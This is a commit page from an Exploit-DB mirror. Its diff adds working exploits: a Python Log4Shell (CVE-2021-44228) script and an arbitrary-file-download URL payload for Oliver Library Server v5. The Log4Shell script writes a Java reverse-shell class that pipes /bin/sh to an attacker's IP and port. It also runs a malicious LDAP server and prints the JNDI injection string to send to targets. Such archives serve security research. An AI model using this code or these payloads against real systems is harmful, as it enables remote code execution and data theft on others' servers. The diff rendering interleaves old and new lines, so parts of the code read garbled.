bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-12-16

Browse source 
2 changes to exploits/shellcodes

Oliver Library Server v5 - Arbitrary File Download
This commit is contained in:
Offensive Security 2021-12-16 05:01:55 +00:00
parent 90f7e494d6
commit 3d06837f80
3 changed files with 132 additions and 49 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

162
exploits/java/remote/50592.py
View file

@ -9,20 +9,30 @@
# Github repo: https://github.com/kozmer/log4j-shell-poc # Github repo: https://github.com/kozmer/log4j-shell-poc
import subprocess import subprocess
import os
import sys import sys
import argparse
from colorama import Fore, init
import subprocess
import threading
javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version']) #stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL) from http.server import HTTPServer, SimpleHTTPRequestHandler
print("\n")
userip = input("[+] Enter IP for LDAPRefServer & Shell: ") init(autoreset=True)
userport = input("[+] Enter listener port for LDAPRefServer: ")
lport = input("[+] Set listener port for shell: ")
def payload(): def listToString(s):
str1 = ""
try:
for ele in s:
str1 += ele
return str1
except Exception as ex:
parser.print_help()
sys.exit()
javapayload = (""" def payload(userip , webport , lport):
genExploit = (
"""
import java.io.IOException; import java.io.IOException;
import java.io.InputStream; import java.io.InputStream;
import java.io.OutputStream; import java.io.OutputStream;
@ -30,52 +40,106 @@ import java.net.Socket;
public class Exploit { public class Exploit {
public Exploit() throws Exception { public Exploit() throws Exception {
String host="%s"; String host="%s";
int port=%s; int port=%s;
String cmd="/bin/sh"; String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start(); Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port); Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) { while(!s.isClosed()) {
while(pi.available()>0) while(pi.available()>0)
so.write(pi.read()); so.write(pi.read());
while(pe.available()>0) while(pe.available()>0)
so.write(pe.read()); so.write(pe.read());
while(si.available()>0) while(si.available()>0)
po.write(si.read()); po.write(si.read());
so.flush(); so.flush();
po.flush(); po.flush();
Thread.sleep(50); Thread.sleep(50);
try { try {
p.exitValue(); p.exitValue();
break; break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
} }
catch (Exception e){
}
};
p.destroy();
s.close();
}
}
""") % (userip, lport)
""") % (userip,lport) # writing the exploit to Exploit.java file
f = open("Exploit.java", "w") try:
f.write(javapayload) f = open("Exploit.java", "w")
f.close() f.write(genExploit)
f.close()
print(Fore.GREEN + '[+] Exploit java class created success')
os.system('./jdk1.8.0_20/bin/javac Exploit.java') except Exception as e:
print(Fore.RED + f'[-] Something went wrong {e.toString()}')
sendme = ("${jndi:ldap://%s:1389/a}") % (userip) checkJavaAvailible()
print("[+] Send me: "+sendme+"\n") print(Fore.GREEN + '[+] Setting up fake LDAP server\n')
def marshalsec(): # create the LDAP server on new thread
os.system("./jdk1.8.0_20/bin/java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer t1 = threading.Thread(target=createLdapServer, args=(userip,webport))
t1.start()
# start the web server
httpd = HTTPServer(('localhost', int(webport)), SimpleHTTPRequestHandler)
httpd.serve_forever()
def checkJavaAvailible():
javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
if(javaver != 0):
print(Fore.RED + '[-] Java is not installed inside the repository ')
sys.exit()
def createLdapServer(userip, lport):
sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
print(Fore.GREEN +"[+] Send me: "+sendme+"\n")
subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])
url = "
http://{}:{}/#Exploit".format http://{}:{}/#Exploit".format
(userip, userport)) (userip, lport)
subprocess.run(["./jdk1.8.0_20/bin/java", "-cp",
"target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url])
if __name__== "__main__": def header():
payload() print(Fore.BLUE+"""
marshalsec() [!] CVE: CVE-2021-44228
[!] Github repo:
https://github.com/kozmer/log4j-shell-poc
""")
if __name__ == "__main__":
header()
try:
parser = argparse.ArgumentParser(description='please enter the values ')
parser.add_argument('--userip', metavar='userip', type=str,
nargs='+', help='Enter IP for LDAPRefServer & Shell')
parser.add_argument('--webport', metavar='webport', type=str,
nargs='+', help='listener port for HTTP port')
parser.add_argument('--lport', metavar='lport', type=str,
nargs='+', help='Netcat Port')
args = parser.parse_args()
#print(args.userip)
payload(listToString(args.userip), listToString(args.webport), listToString(args.lport))
except KeyboardInterrupt:
print(Fore.RED + "user interupted the program.")
sys.exit(0)

18
exploits/windows/remote/50599.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016
Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server Versions < 8.00.008.053 via the FileServlet function allows for arbitrary file download by an attacker using unsanitized user supplied input.
Steps to Exploit:
1) Use the following Payload:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>
2) Example to download iis.log file:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log

1
files_exploits.csv
View file

@ -18583,6 +18583,7 @@ id,file,description,date,author,type,platform,port
50588,exploits/linux/remote/50588.txt,"HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux, 50588,exploits/linux/remote/50588.txt,"HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux,
50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",1970-01-01,leonjza,remote,java, 50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",1970-01-01,leonjza,remote,java,
50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",1970-01-01,kozmer,remote,java, 50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",1970-01-01,kozmer,remote,java,
50599,exploits/windows/remote/50599.txt,"Oliver Library Server v5 - Arbitrary File Download",1970-01-01,"Mandeep Singh",remote,windows,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,

Can't render this file because it is too large.